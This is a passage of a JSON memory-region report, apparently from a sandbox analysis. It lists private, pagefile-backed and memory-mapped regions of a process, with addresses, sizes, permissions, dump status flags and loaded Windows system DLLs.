16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_2966", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:01:25.088", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable" ], "ref_process_dump": null, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_2967", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:01:25.088", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "ignored_region" ], "info": "No dump was created because this is an ignored region", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8793945538560, "start_va": 2147418112, "type": "region", "version": 1 }, "end_va": 8796092956671, "entry_point": 0, "filename": null, "id": "region_2968", "name": "private_0x000000007fff0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147418112, "timestamp": "00:01:25.088", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 3276800, "type": "region", "version": 1 }, "end_va": 3801087, "entry_point": 0, "filename": null, "id": "region_2969", "name": "private_0x0000000000320000", "norm_filename": null, "region_type": "private_memory", "start_va": 3276800, "timestamp": "00:01:25.092", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1945960448, "type": "region", "version": 1 }, "end_va": 1945993215, "entry_point": 1945968888, "filename": "\\Windows\\System32\\wow64cpu.dll", "id": "region_2970", "name": "wow64cpu.dll", "norm_filename": "c:\\windows\\system32\\wow64cpu.dll", "region_type": "memory_mapped_file", "start_va": 1945960448, "timestamp": "00:01:25.093", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1946025984, "type": "region", "version": 1 }, "end_va": 1946402815, "entry_point": 1946285976, "filename": "\\Windows\\System32\\wow64win.dll", "id": "region_2971", "name": "wow64win.dll", "norm_filename": "c:\\windows\\system32\\wow64win.dll", "region_type": "memory_mapped_file", "start_va": 1946025984, "timestamp": "00:01:25.093", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 258048, "start_va": 1946419200, "type": "region", "version": 1 }, "end_va": 1946677247, "entry_point": 1946607224, "filename": "\\Windows\\System32\\wow64.dll", "id": "region_2972", "name": "wow64.dll", "norm_filename": "c:\\windows\\system32\\wow64.dll", "region_type": "memory_mapped_file", "start_va": 1946419200, "timestamp": "00:01:25.093", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1024000, "start_va": 2001338368, "type": "region", "version": 1 }, "end_va": 2002362367, "entry_point": 0, "filename": null, "id": "region_2973", "name": "private_0x00000000774a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2001338368, "timestamp": "00:01:25.094", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1175552, "start_va": 2002386944, "type": "region", "version": 1 }, "end_va": 2003562495, "entry_point": 0, "filename": null, "id": "region_2974", "name": "private_0x00000000775a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2002386944, "timestamp": "00:01:25.094", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_2975", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:01:25.116", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_2976", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:01:25.116", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 983040, "type": "region", "version": 1 }, "end_va": 1404927, "entry_point": 983040, "filename": "\\Windows\\System32\\locale.nls", "id": "region_2977", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 983040, "timestamp": "00:01:25.116", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 5111808, "type": "region", "version": 1 }, "end_va": 5177343, "entry_point": 0, "filename": null, "id": "region_2978", "name": "private_0x00000000004e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 5111808, "timestamp": "00:01:25.117", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 6881280, "type": "region", "version": 1 }, "end_va": 7929855, "entry_point": 0, "filename": null, "id": "region_2979", "name": "private_0x0000000000690000", "norm_filename": null, "region_type": "private_memory", "start_va": 6881280, "timestamp": "00:01:25.117", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 962560, "start_va": 1787428864, "type": "region", "version": 1 }, "end_va": 1788391423, "entry_point": 1787433934, "filename": "\\Windows\\SysWOW64\\dbghelp.dll", "id": "region_2980", "name": "dbghelp.dll", "norm_filename": "c:\\windows\\syswow64\\dbghelp.dll", "region_type": "memory_mapped_file", "start_va": 1787428864, "timestamp": "00:01:25.117", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 1788411904, "type": "region", "version": 1 }, "end_va": 1788473343, "entry_point": 1788416673, "filename": "\\Windows\\SysWOW64\\wkscli.dll", "id": "region_2981", "name": "wkscli.dll", "norm_filename": "c:\\windows\\syswow64\\wkscli.dll", "region_type": "memory_mapped_file", "start_va": 1788411904, "timestamp": "00:01:25.117", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1788477440, "type": "region", "version": 1 }, "end_va": 1788514303, "entry_point": 1788482982, "filename": "\\Windows\\SysWOW64\\netutils.dll", "id": "region_2982", "name": "netutils.dll", "norm_filename": "c:\\windows\\syswow64\\netutils.dll", "region_type": "memory_mapped_file", "start_va": 1788477440, "timestamp": "00:01:25.118", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 69632, "start_va": 1788542976, "type": "region", "version": 1 }, "end_va": 1788612607, "entry_point": 1788547840, "filename": "\\Windows\\SysWOW64\\netapi32.dll", "id": "region_2983", "name": "netapi32.dll", "norm_filename": "c:\\windows\\syswow64\\netapi32.dll", "region_type": "memory_mapped_file", "start_va": 1788542976, "timestamp": "00:01:25.118", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 1788674048, "type": "region", "version": 1 }, "end_va": 1788891135, "entry_point": 1788679125, "filename": "\\Windows\\SysWOW64\\framedynos.dll", "id": "region_2984", "name": "framedynos.dll", "norm_filename": "c:\\windows\\syswow64\\framedynos.dll", "region_type": "memory_mapped_file", "start_va": 1788674048, "timestamp": "00:01:25.118", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 73728, "start_va": 1941569536, "type": "region", "version": 1 }, "end_va": 1941643263, "entry_point": 1941574144, "filename": "\\Windows\\SysWOW64\\mpr.dll", "id": "region_2985", "name": "mpr.dll", "norm_filename": "c:\\windows\\syswow64\\mpr.dll", "region_type": "memory_mapped_file", "start_va": 1941569536, "timestamp": "00:01:25.119", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 53248, "start_va": 1944256512, "type": "region", "version": 1 }, "end_va": 1944309759, "entry_point": 1944261088, "filename": "\\Windows\\SysWOW64\\wtsapi32.dll", "id": "region_2986", "name": "wtsapi32.dll", "norm_filename": "c:\\windows\\syswow64\\wtsapi32.dll", "region_type": "memory_mapped_file", "start_va": 1944256512, "timestamp": "00:01:25.119", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1946681344, "type": "region", "version": 1 }, "end_va": 1946714111, "entry_point": 1946685673, "filename": "\\Windows\\SysWOW64\\secur32.dll", "id": "region_2987", "name": "secur32.dll", "norm_filename": "c:\\windows\\syswow64\\secur32.dll", "region_type": "memory_mapped_file", "start_va": 1946681344, "timestamp": "00:01:25.120", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1958019072, "type": "region", "version": 1 }, "end_va": 1958055935, "entry_point": 1958023712, "filename": "\\Windows\\SysWOW64\\version.dll", "id": "region_2988", "name": "version.dll", "norm_filename": "c:\\windows\\syswow64\\version.dll", "region_type": "memory_mapped_file", "start_va": 1958019072, "timestamp": "00:01:25.120", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1966276608, "type": "region", "version": 1 }, "end_va": 1966379007, "entry_point": 1966281497, "filename": "\\Windows\\SysWOW64\\srvcli.dll", "id": "region_2989", "name": "srvcli.dll", "norm_filename": "c:\\windows\\syswow64\\srvcli.dll", "region_type": "memory_mapped_file", "start_va": 1966276608, "timestamp": "00:01:25.121", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1967063040, "type": "region", "version": 1 }, "end_va": 1967112191, "entry_point": 1967067361, "filename": "\\Windows\\SysWOW64\\cryptbase.dll", "id": "region_2990", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\syswow64\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1967063040, "timestamp": "00:01:25.121", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1967128576, "type": "region", "version": 1 }, "end_va": 1967521791, "entry_point": 1967236019, "filename": "\\Windows\\SysWOW64\\sspicli.dll", "id": "region_2991", "name": "sspicli.dll", "norm_filename": "c:\\windows\\syswow64\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1967128576, "timestamp": "00:01:25.122", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1968832512, "type": "region", "version": 1 }, "end_va": 1969537023, "entry_point": 1968874610, "filename": "\\Windows\\SysWOW64\\msvcrt.dll", "id": "region_2992", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\syswow64\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1968832512, "timestamp": "00:01:25.122", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1983840256, "type": "region", "version": 1 }, "end_va": 1984495615, "entry_point": 1983924709, "filename": "\\Windows\\SysWOW64\\advapi32.dll", "id": "region_2993", "name": "advapi32.dll", "norm_filename": "c:\\windows\\syswow64\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1983840256, "timestamp": "00:01:25.123", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1114112, "start_va": 1985085440, "type": "region", "version": 1 }, "end_va": 1986199551, "entry_point": 1985163987, "filename": "\\Windows\\SysWOW64\\kernel32.dll", "id": "region_2994", "name": "kernel32.dll", "norm_filename": "c:\\windows\\syswow64\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1985085440, "timestamp": "00:01:25.123", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 983040, "start_va": 1986592768, "type": "region", "version": 1 }, "end_va": 1987575807, "entry_point": 1986659689, "filename": "\\Windows\\SysWOW64\\rpcrt4.dll", "id": "region_2995", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1986592768, "timestamp": "00:01:25.124", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1987575808, "type": "region", "version": 1 }, "end_va": 1987932159, "entry_point": 1987681190, "filename": "\\Windows\\SysWOW64\\shlwapi.dll", "id": "region_2996", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\syswow64\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1987575808, "timestamp": "00:01:25.124", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 585728, "start_va": 1989214208, "type": "region", "version": 1 }, "end_va": 1989799935, "entry_point": 1989230513, "filename": "\\Windows\\SysWOW64\\oleaut32.dll", "id": "region_2997", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\syswow64\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 1989214208, "timestamp": "00:01:25.125", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1989804032, "type": "region", "version": 1 }, "end_va": 1989906431, "entry_point": 1989822837, "filename": "\\Windows\\SysWOW64\\sechost.dll", "id": "region_2998", "name": "sechost.dll", "norm_filename": "c:\\windows\\syswow64\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1989804032, "timestamp": "00:01:25.125", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 1992818688, "type": "region", "version": 1 }, "end_va": 1992843263, "entry_point": 1992824706, "filename": "\\Windows\\SysWOW64\\nsi.dll", "id": "region_2999", "name": "nsi.dll", "norm_filename": "c:\\windows\\syswow64\\nsi.dll", "region_type": "memory_mapped_file", "start_va": 1992818688, "timestamp": "00:01:25.126", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1992884224, "type": "region", "version": 1 }, "end_va": 1993527295, "entry_point": 1993097175, "filename": "\\Windows\\SysWOW64\\usp10.dll", "id": "region_3000", "name": "usp10.dll", "norm_filename": "c:\\windows\\syswow64\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1992884224, "timestamp": "00:01:25.126", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 1993539584, "type": "region", "version": 1 }, "end_va": 1994964991, "entry_point": 1993849405, "filename": "\\Windows\\SysWOW64\\ole32.dll", "id": "region_3001", "name": "ole32.dll", "norm_filename": "c:\\windows\\syswow64\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 1993539584, "timestamp": "00:01:25.127", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1995046912, "type": "region", "version": 1 }, "end_va": 1995087871, "entry_point": 1995060896, "filename": "\\Windows\\SysWOW64\\lpk.dll", "id": "region_3002", "name": "lpk.dll", "norm_filename": "c:\\windows\\syswow64\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1995046912, "timestamp": "00:01:25.127", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 1997733888, "type": "region", "version": 1 }, "end_va": 1997950975, "entry_point": 1997739101, "filename": "\\Windows\\SysWOW64\\ws2_32.dll", "id": "region_3003", "name": "ws2_32.dll", "norm_filename": "c:\\windows\\syswow64\\ws2_32.dll", "region_type": "memory_mapped_file", "start_va": 1997733888, "timestamp": "00:01:25.128", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 286720, "start_va": 1999372288, "type": "region", "version": 1 }, "end_va": 1999659007, "entry_point": 1999402104, "filename": "\\Windows\\SysWOW64\\KernelBase.dll", "id": "region_3004", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\syswow64\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1999372288, "timestamp": "00:01:25.128", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1048576, "start_va": 1999699968, "type": "region", "version": 1 }, "end_va": 2000748543, "entry_point": 1999812333, "filename": "\\Windows\\SysWOW64\\user32.dll", "id": "region_3005", "name": "user32.dll", "norm_filename": "c:\\windows\\syswow64\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1999699968, "timestamp": "00:01:25.129", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 589824, "start_va": 2000748544, "type": "region", "version": 1 }, "end_va": 2001338367, "entry_point": 2000839491, "filename": "\\Windows\\SysWOW64\\gdi32.dll", "id": "region_3006", "name": "gdi32.dll", "norm_filename": "c:\\windows\\syswow64\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 2000748544, "timestamp": "00:01:25.130", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_3007", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:01:25.131", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_3008", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:01:25.131", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 7929856, "type": "region", "version": 1 }, "end_va": 9535487, "entry_point": 0, "filename": null, "id": "region_3009", "name": "pagefile_0x0000000000790000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 7929856, "timestamp": "00:01:25.141", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1987969024, "type": "region", "version": 1 }, "end_va": 1988362239, "entry_point": 1988040079, "filename": "\\Windows\\SysWOW64\\imm32.dll", "id": "region_3010", "name": "imm32.dll", "norm_filename": "c:\\windows\\syswow64\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1987969024, "timestamp": "00:01:25.141", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1998520320, "type": "region", "version": 1 }, "end_va": 1999355903, "entry_point": 1998526091, "filename": "\\Windows\\SysWOW64\\msctf.dll", "id": "region_3011", "name": "msctf.dll", "norm_filename": "c:\\windows\\syswow64\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1998520320, "timestamp": "00:01:25.141", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 225279, "entry_point": 0, "filename": null, "id": "region_3012", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:01:25.313", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 466943, "entry_point": 0, "filename": null, "id": "region_3013", "name": "pagefile_0x0000000000070000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 458752, "timestamp": "00:01:25.313", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 16384, "start_va": 524288, "type": "region", "version": 1 }, "end_va": 540671, "entry_point": 524288, "filename": "\\Windows\\SysWOW64\\en-US\\taskkill.exe.mui", "id": "region_3014", "name": "taskkill.exe.mui", "norm_filename": "c:\\windows\\syswow64\\en-us\\taskkill.exe.mui", "region_type": "memory_mapped_file", "start_va": 524288, "timestamp": "00:01:25.313", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 589824, "type": "region", "version": 1 }, "end_va": 593919, "entry_point": 0, "filename": null, "id": "region_3015", "name": "private_0x0000000000090000", "norm_filename": null, "region_type": "private_memory", "start_va": 589824, "timestamp": "00:01:25.314", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 655360, "type": "region", "version": 1 }, "end_va": 659455, "entry_point": 0, "filename": null, "id": "region_3016", "name": "private_0x00000000000a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 655360, "timestamp": "00:01:25.314", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1441792, "type": "region", "version": 1 }, "end_va": 1445887, "entry_point": 0, "filename": null, "id": "region_3017", "name": "pagefile_0x0000000000160000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1441792, "timestamp": "00:01:25.314", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 786432, "start_va": 2162688, "type": "region", "version": 1 }, "end_va": 2949119, "entry_point": 2162688, "filename": "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui", "id": "region_3018", "name": "kernelbase.dll.mui", "norm_filename": "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui", "region_type": "memory_mapped_file", "start_va": 2162688, "timestamp": "00:01:25.314", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 4784128, "type": "region", "version": 1 }, "end_va": 5046271, "entry_point": 0, "filename": null, "id": "region_3019", "name": "private_0x0000000000490000", "norm_filename": null, "region_type": "private_memory", "start_va": 4784128, "timestamp": "00:01:25.315", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 5767168, "type": "region", "version": 1 }, "end_va": 6029311, "entry_point": 0, "filename": null, "id": "region_3020", "name": "private_0x0000000000580000", "norm_filename": null, "region_type": "private_memory", "start_va": 5767168, "timestamp": "00:01:25.315", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 6553600, "type": "region", "version": 1 }, "end_va": 6815743, "entry_point": 0, "filename": null, "id": "region_3021", "name": "private_0x0000000000640000", "norm_filename": null, "region_type": "private_memory", "start_va": 6553600, "timestamp": "00:01:25.315", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 9568256, "type": "region", "version": 1 }, "end_va": 11145215, "entry_point": 0, "filename": null, "id": "region_3022", "name": "pagefile_0x0000000000920000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 9568256, "timestamp": "00:01:25.315", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 11206656, "type": "region", "version": 1 }, "end_va": 32178175, "entry_point": 0, "filename": null, "id": "region_3023", "name": "pagefile_0x0000000000ab0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 11206656, "timestamp": "00:01:25.315", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 536576, "start_va": 1984495616, "type": "region", "version": 1 }, "end_va": 1985032191, "entry_point": 1984504786, "filename": "\\Windows\\SysWOW64\\clbcatq.dll", "id": "region_3024", "name": "clbcatq.dll", "norm_filename": "c:\\windows\\syswow64\\clbcatq.dll", "region_type": "memory_mapped_file", "start_va": 1984495616, "timestamp": "00:01:25.315", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130542592, "type": "region", "version": 1 }, "end_va": 2130554879, "entry_point": 0, "filename": null, "id": "region_3025", "name": "private_0x000000007efd8000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130542592, "timestamp": "00:01:25.316", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 